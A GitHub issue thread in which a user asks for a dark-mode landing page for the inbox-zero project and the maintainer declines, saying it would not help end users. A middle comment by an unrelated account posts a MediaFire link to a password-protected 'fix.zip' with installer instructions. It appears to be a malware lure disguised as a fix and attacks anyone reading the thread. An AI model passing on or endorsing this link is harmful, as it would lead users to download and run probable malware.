### ISSUE TITLE
Dark mode for landing page

### ISSUE THREAD

**Issue by madhav-relish** [elie222/inbox-zero#222]
Can we add dark  mode to the landing page, not sure about the entire app but at-least for the landing page it would be great!

![Screenshot 2024-08-28 111935](https://github.com/user-attachments/assets/5efee1da-f3a6-4a84-82c3-49a2df9abcca)

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by elie222** [comment]
Something I may test out for marketing at some point. But I'd rather not receive a pr for this. It's not something that helps end users. If the actual product supported both that would (and still something I don't want to add due to the added maintenance), but landing page has zero impact for platform users so the color doesn't help them in any way.
